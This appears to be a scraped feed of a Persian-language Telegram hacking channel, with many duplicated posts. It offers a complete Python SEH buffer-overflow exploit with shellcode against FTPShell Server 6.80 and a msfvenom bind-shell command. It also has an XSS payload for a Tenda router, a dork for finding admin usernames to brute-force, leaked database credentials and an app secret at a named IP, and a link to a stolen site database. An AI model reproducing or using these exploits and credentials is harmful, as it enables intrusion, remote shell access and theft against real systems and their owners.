Forwarded from اتچ بات
#Pentesting - #Part 2 - #hackertest_Net
————————-
سلام خدمت دوستان
قسمت دوم اموزش
hackertest
نیز اماده شد.
توضیحات کامل در داخل فیلم گفته شده
فقط تنها نکته ای باید توجه کنیداینه که :
پسورد
131
نیست
بلکه
l3l
هست.
—————————
T.me/LeranExploit
0Day.Today Boy's
————————-
سلام خدمت دوستان
قسمت دوم اموزش
hackertest
نیز اماده شد.
توضیحات کامل در داخل فیلم گفته شده
فقط تنها نکته ای باید توجه کنیداینه که :
پسورد
131
نیست
بلکه
l3l
هست.
—————————
T.me/LeranExploit
0Day.Today Boy's
Telegram
#Target #wp #Database
——————————
Target :
Database :
file size : 1.6G
——————————-
T.me/LearnExploit
——————————
Target :
https://www.carisma.net/
\-------------\
Database :
yon.ir/SPRfx
\-------------\
file size : 1.6G
——————————-
T.me/LearnExploit
Forwarded from اتچ بات
Telegram
#Xss #Bug In #Router (Tenda D152 ADSL Router)
و اینبار اسیب پذیری xss در روتر tenda :
برای مشاهده ی این اسیب پذیری وارد روتر
(Wifi Router Gateway)
خود شید :
http://Target/login
——
سپس به مسیر زیر برید :
بعد SSID رو به
تغییر بدید و پیج رو رفرش کنید :)
پاپ اپ LearnExploit قابل رویت است برای شما...
————————
T.me/LearnExploit
0Day.Today Boy's
و اینبار اسیب پذیری xss در روتر tenda :
برای مشاهده ی این اسیب پذیری وارد روتر
(Wifi Router Gateway)
خود شید :
http://Target/login
——
سپس به مسیر زیر برید :
General Setup
--> Wireless
--> Basic Settings
بعد SSID رو به
<script>alert("LearnExploit")</script>
تغییر بدید و پیج رو رفرش کنید :)
پاپ اپ LearnExploit قابل رویت است برای شما...
————————
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#Dork | Get Username admin site or forums...
————————-
#Dork :
|Descriptions : |
دوستان این دورک user ادمین سایت رو میده
و شما میتونید از ان برای bruteforce استفاده کنید تا پسورد سایت رو بدست بیارید.
—————————
#GHDB
@LearnExploit
————————-
#Dork :
inurl:/profile.php?lookup=1
|Descriptions : |
دوستان این دورک user ادمین سایت رو میده
و شما میتونید از ان برای bruteforce استفاده کنید تا پسورد سایت رو بدست بیارید.
—————————
#GHDB
@LearnExploit
#Datbase #User #Passwd
============================
parameters:
database_driver: pdo_mysql
database_host: 127.0.0.1
database_port: null
database_name: basededattos
database_user: ruben
database_password: calipo123
mailer_transport: smtp
mailer_host: rubenpeib@gmail.com
mailer_user: null
mailer_password: null
locale: en
secret: 94f06f449a955c057befc3043d374fc9c0b21329
database_path: null
==============================
=== > see : http://159.149.130.120/ruben/app/config
============================================
@LearnExploit
============================
parameters:
database_driver: pdo_mysql
database_host: 127.0.0.1
database_port: null
database_name: basededattos
database_user: ruben
database_password: calipo123
mailer_transport: smtp
mailer_host: rubenpeib@gmail.com
mailer_user: null
mailer_password: null
locale: en
secret: 94f06f449a955c057befc3043d374fc9c0b21329
database_path: null
==============================
=== > see : http://159.149.130.120/ruben/app/config
============================================
@LearnExploit
#Pentesting - #Part 3 - #hackertest_Net
—————————————————-
سلام دوستان
با قسمت سوم (level 3) از اموزش hackertest با شما هستیم .
# به دلیل اینکه بیشتر موارد رو توضیح دادم دیگه توضیح نمیدم
خب یه نیگا به کد زیر بندازیم :
{
{
}
{
}
}
مواردی که از کد بالا میفهمیم :
1) در خط پنجم یک مقدار تعریف میکنه تا این مقدار توسط کاربر وارد شه
2) در خط ششم این مقدار رو برابر
قرار میده
مقدار بالا میگه که از کل صفحه مقدار alinkcolor رو برامون انتخاب کن
مقدار alinkcolor در تگ body :
میباشد .
یعنی کل موارد بالا == اگر ورودی کاربر مساوی
هدایت کن
# = > شاید بپرسید 97,98,114,97,101 این اعداد اگر دیکد بشن چی میشه ؟
در جواب باید بگم
مقداری است که بعد از دیکد حاصل میشه...
3) در اخر هم بخش :
{
این است که اگر مقدار ورودی کاربر برابر
—————————————————-
دوستان علت اینکه فیلم رکورد نمیکنم این هست که تا چند level موارد شبیه هم هستن و نیازی به رکورد نمیبینم و توضیح میدم.
امیدوارم که کسل کننده نباشه...
—————————————————-
T.me/LearnExploit
0Day.Today Boy's
—————————————————-
سلام دوستان
با قسمت سوم (level 3) از اموزش hackertest با شما هستیم .
# به دلیل اینکه بیشتر موارد رو توضیح دادم دیگه توضیح نمیدم
خب یه نیگا به کد زیر بندازیم :
<body onload=javascript:pass(); alink="#000000">
<SCRIPT LANGUAGE="JavaScript">
function pass()
{
var pw, Eingabe;
pw = window.document.alinkColor;
Eingabe = prompt ("Please enter password");
if (Eingabe == pw)
{
window.location.href=String.fromCharCode(97,98,114,97,101)+".htm";
}
else
{
alert("Try again");
}
}
</SCRIPT>
مواردی که از کد بالا میفهمیم :
1) در خط پنجم یک مقدار تعریف میکنه تا این مقدار توسط کاربر وارد شه
2) در خط ششم این مقدار رو برابر
window.document.alinkColor;
قرار میده
مقدار بالا میگه که از کل صفحه مقدار alinkcolor رو برامون انتخاب کن
مقدار alinkcolor در تگ body :
#00000
میباشد .
یعنی کل موارد بالا == اگر ورودی کاربر مساوی
#00000
بود مارو به String.fromCharCode(97,98,114,97,101)+".htm";
هدایت کن
# = > شاید بپرسید 97,98,114,97,101 این اعداد اگر دیکد بشن چی میشه ؟
در جواب باید بگم
abrae
مقداری است که بعد از دیکد حاصل میشه...
3) در اخر هم بخش :
else
{
alert("Try again");
این است که اگر مقدار ورودی کاربر برابر
#00000
نبود این عمل رو دوباره انجام بده.—————————————————-
دوستان علت اینکه فیلم رکورد نمیکنم این هست که تا چند level موارد شبیه هم هستن و نیازی به رکورد نمیبینم و توضیح میدم.
امیدوارم که کسل کننده نباشه...
—————————————————-
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Forwarded from اتچ بات
#BufferOverFlow (#BOF) #Bug
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
Telegram
اتچ بات
#BufferOverFlow (#BOF) #Bug ——————— سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید. ———————- Dl Link : yon.ir/bakJW ———————- Recorded By Ashkan Mogadas ———————- T.me/LearnExploit 0Day.Today Boy's
در پی این پست ...
post link : https://t.me/LearnExploit/381
خواستم مثال زنده براتون بزنم :
=============================================
#BufferOverFlow (#BOF) #Bug
اخرین اکسپلویتی که در این مورد ثبت شده مربوط به
لینک دانلود این نرم افزار :
http://www.ftpshell.com/downloadserver.htm
————
اکسپلویت :
نحوه ی ساختن شل کد خودتون :
#msfvenom -p windows/shell_bind_tcp LHOST=270.0.0.1 LPORT=8080 -b '\x00\x0A\x0D' -f c -o /root/Desktop/
———————
# اگر برای دوستان نامفهوم هست لطفا به فیلم اموزشی توجه کنند.
———————
ولی من یه توضیحی هم میدم دربارش :
با این پیلود رو مشخص میکنه
لیست charcode هارو براتون میگه
نوع فرمت فایل خروجی رو براتون میگه
لیست کامل فرمت ها :
مسیر فایل خروجی
LHOST & LPORT
هم که پورت و ایپی هست که متاسپلویت روی اون شنود میکنه (در این قسمت باید LHOST & LPORT خودتون رو وارد کنید.)
———————————————
T.me/LearnExploit
0Day.Today Boy's
post link : https://t.me/LearnExploit/381
خواستم مثال زنده براتون بزنم :
=============================================
#BufferOverFlow (#BOF) #Bug
اخرین اکسپلویتی که در این مورد ثبت شده مربوط به
FTPShell Server V 6.80
در قسمت Add Account Name
میباشد.لینک دانلود این نرم افزار :
http://www.ftpshell.com/downloadserver.htm
————
اکسپلویت :
#!/usr/bin/env python
shellcode = (
"\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1"
"\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c"
"\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59"
"\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14"
"\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93"
"\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1"
"\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8"
"\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf"
"\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25"
"\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d"
"\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73"
"\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74"
"\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2"
"\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1"
"\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6"
"\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e"
"\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff"
"\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc"
"\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19"
"\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74"
"\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b"
"\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11"
"\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39")
nSEH = "\xEB\x06\x90\x90"
SEH = "\x47\x05\xFC\x7F" #7FFC0547 POP EDI
buffer = "\x41" * 1268 + nSEH + SEH + shellcode
f = open ("FTPShell_Server_6.80.txt", "w")
f.write(buffer)
f.close()
————————————————نحوه ی ساختن شل کد خودتون :
#msfvenom -p windows/shell_bind_tcp LHOST=270.0.0.1 LPORT=8080 -b '\x00\x0A\x0D' -f c -o /root/Desktop/
———————
# اگر برای دوستان نامفهوم هست لطفا به فیلم اموزشی توجه کنند.
———————
ولی من یه توضیحی هم میدم دربارش :
-p
:با این پیلود رو مشخص میکنه
-b
:لیست charcode هارو براتون میگه
-f
:نوع فرمت فایل خروجی رو براتون میگه
لیست کامل فرمت ها :
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small,
hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection,
psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh,
vbapplication, vbscript
-o
: مسیر فایل خروجی
LHOST & LPORT
هم که پورت و ایپی هست که متاسپلویت روی اون شنود میکنه (در این قسمت باید LHOST & LPORT خودتون رو وارد کنید.)
———————————————
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
#BufferOverFlow (#BOF) #Bug
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
Forwarded from Deleted Account
python_6.rar
24.4 MB
Forwarded from Deleted Account
python_7.rar
37.8 MB
Forwarded from Deleted Account
python_8.rar
14.8 MB
Forwarded from Deleted Account
python_9.rar
11 MB
Forwarded from Deleted Account
python_10.rar
7.3 MB